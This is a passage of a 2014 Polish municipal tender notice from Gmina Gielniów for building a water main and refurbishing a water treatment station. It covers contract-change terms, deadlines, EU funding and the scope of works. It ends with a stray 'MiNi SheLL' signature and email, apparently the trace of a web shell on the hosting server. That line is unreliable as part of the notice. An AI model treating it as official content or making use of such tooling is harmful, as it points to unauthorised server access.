Przed skierowaniem do Zamawiającego wniosku o dokonanie zmian, Wykonawca winien uzyskać opinie Inspektora Nadzoru co do proponowanych zmian, a ponadto jeżeli dotyczą one ust.4 pkt.4.2 również autora projektu.
Kosztorysy, o których mowa w ust.6 pkt.6.2.3 muszą zostać sprawdzone i zaakceptowane przez Inspektora Nadzoru.
7.Zawarcie umowy na roboty dodatkowe , o której mowa w ust.5 pkt.5.3 , możliwe będzie  po przeprowadzeniu odrębnego postepowania , podstawę którego stanowić będzie protokół konieczności  wykonania robót dodatkowych, zaakceptowany  przez Zamawiającego., podpisany przez Wykonawcę i Inspektora Nadzoru.    
5. Wszelkie zmiany i uzupełnienia  treści  niniejszej umowy , wymagają aneksu sporządzonego w formie pisemnej pod rygorem nieważności.
8. Zmianie   może ulec wysokość wynagrodzenia  w następstwie zmiany w okresie obowiązywania umowy       przepisów o podatku VAT  ( wartość netto pozostaje bez zmian);
9. Zmianie może ulec forma zabezpieczenia  należytego wykonania umowy ;
10. Zmiana może dotyczyć dopuszczalnej prawem  zmiany stron umowy lub oznaczenia stron umowy, wprowadzenia lub zmiana podwykonawcy;
11.Zmiana może dotyczyć zmiany kierownika budowy   ( ustanie stosunku pracy lub inne losowe zdarzenie niezależne od wykonawcy), pod warunkiem spełnienia wymaganego warunku przez nowo wskazaną osobę.
12. Strona występująca  o zmianę postanowień niniejszej umowy zobowiązana jest do udokumentowania zaistnienia okoliczności powodującej zmianę. Wniosek o zmianę postanowień umowy musi być wyrażony na piśmie. 
13. W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, zamawiający może odstąpić od umowy w terminie 30 dni  od powzięcia wiadomości o tych okolicznościach.
14. W wypadku o którym mowa w ust.13 , Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.uggielniow.nv.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Gielniów, Plac Wolności 75, pok. Nr 9..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.09.2014 godzina 14:00, miejsce: Urząd Gminy Gielniów, Plac Wolności 75,26-434 Gielniów - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Rozwoju Obszarów Wiejskich na lata 2007-2013 ,dofinansowanie projektu W Ramach Osi 3  Jakość życia na obszarach wiejskich i różnicowanie gospodarki wiejskiej, działanie 321 Podstawowe usługi dla gospodarki i ludności wiejskiej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Etap I Budowa sieci wodociągowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia są kompleksowe roboty w zakresie budowy wodociągu Gielniów - Zielonka . 
1.	Zakres robót montażowych: 
a)	Sieć wodociągowa z rur PEHD 100 SDR 17,6 o średnicy 110mm - 2383,21 mb
b)	Zasuwy wodociągowe kołnierzowe o średnicy 100mm - 2 szt.
c)	Hydranty podziemne z zasuwą kołnierzową o średnicy 80mm - 4 szt.

2.	Do zakresu Wykonawcy należy również:
a)	Organizacja i zabezpieczenie placu budowy,
b)	Projekt organizacji ruchu wraz z  koniecznymi uzgodnieniami ( gdy będzie wymagany),
c)	Uzyskanie stosownych decyzji  wraz z opłatami oraz wykonanie tych decyzji na koszt wykonawcy np. zajęcie pasa drogowego , związanych z realizacją robót  w pobliżu urządzeń wymagających stosownych decyzji , innych niezbędnych przy realizacji zadania ,
d)	Odwodnienie wykopów na czas prowadzonych robót ,
e)	Zabezpieczenie na czas robót istniejącego uzbrojenia  ( np. kabli energetycznych  lub telefonicznych)
f)	Wykonanie wymaganych badań i prób
g)	Przygotowanie dokumentacji do odbioru końcowego,
h)	Likwidacja budowy i uporządkowanie terenu objętego placem budowy
i)	Zabezpieczenie mediów ( woda , prąd , gaz)
j)	Pełna obsługa geodezyjna w trakcie  realizacji zadania wraz z 4 egzemplarzami inwentaryzacji powykonawczej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Etap II Remont i przebudowa stacji uzdatniania wody.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac obejmuje:
1.	Roboty  instalacyjne wodno - kanalizacyjne i sanitarne polegające  na 
a)	demontażu istniejących urządzeń i instalacji uzdatniania oraz budowie  nowej technologii uzdatniania wody .
b)	zamontowaniu nowych odżelaziaczy , zestawów pompowych dla zasilania sieci wodociągowych.
c)	Wykonaniu w budynku stacji  nowych rurociągów technologicznych w systemie klejowym z PVC z wykorzystaniem istniejącego zbiornika hydroforowego.
d)	Montażu nowej sprężarki i aeratora  
e)	Montażu systemu AKPiA sterującego urządzeniami.

2.	Roboty instalacyjne elektryczne  polegające  na demontażu instalacji istniejącej  w pomieszczeniach podlegających  przebudowie oraz budowie nowej instalacji elektrycznej oświetlenia  i gniazd wtyczkowych oraz rozdzielnicy zasilającej. 
a)	Montaż instalacji elektrycznej obejmuje: 
- wykonanie bruzd pod przewody , otworów , przejść przez ściany 
- montaż rur peschla
- montaż puszek rozgałęźnych  i pod osprzęt
- wciąganie i układanie  przewodów
- montaż osprzętu i opraw oświetleniowych , gniazd , rozdzielnicy
- przyłączenie przewodów do osprzętu
- pomiary ochrony  przeciwpożarowej ,

b)	Demontaż obejmuje istniejącą instalację wraz z oprawami oświetlenia, łącznikami , gniazdami i puszkami instalacyjnymi,

3.	Roboty wykończeniowe w zakresie obiektów budowlanych polegające na :
a)	Dociepleniu ścian zewnętrznych i dachu
b)	Wymianie stolarki okiennej, 
c)	Wykonaniu okładzin ścian wewnątrz budynku z glazury do wysokości 2m 
d)	Ułożeniu gresu na posadzce
e)	Pomalowanie farba emulsyjną ścian powyżej glazury oraz sufitu

Uwaga !

Wskazuje się , że wykonanie robót technologicznych na stacji uzdatniania wody będzie możliwe dopiero po wykonaniu części 1 zamówienia związanej z budową sieci wodociągowej, która zapewni dostawę wody dla poszczególnych miejscowości na czas wyłączenia  z użytkowania  stacji uzdatniania wody spowodowanej wymianą instalacji i  urządzeń technologicznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.33.00.00-9, 45.40.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com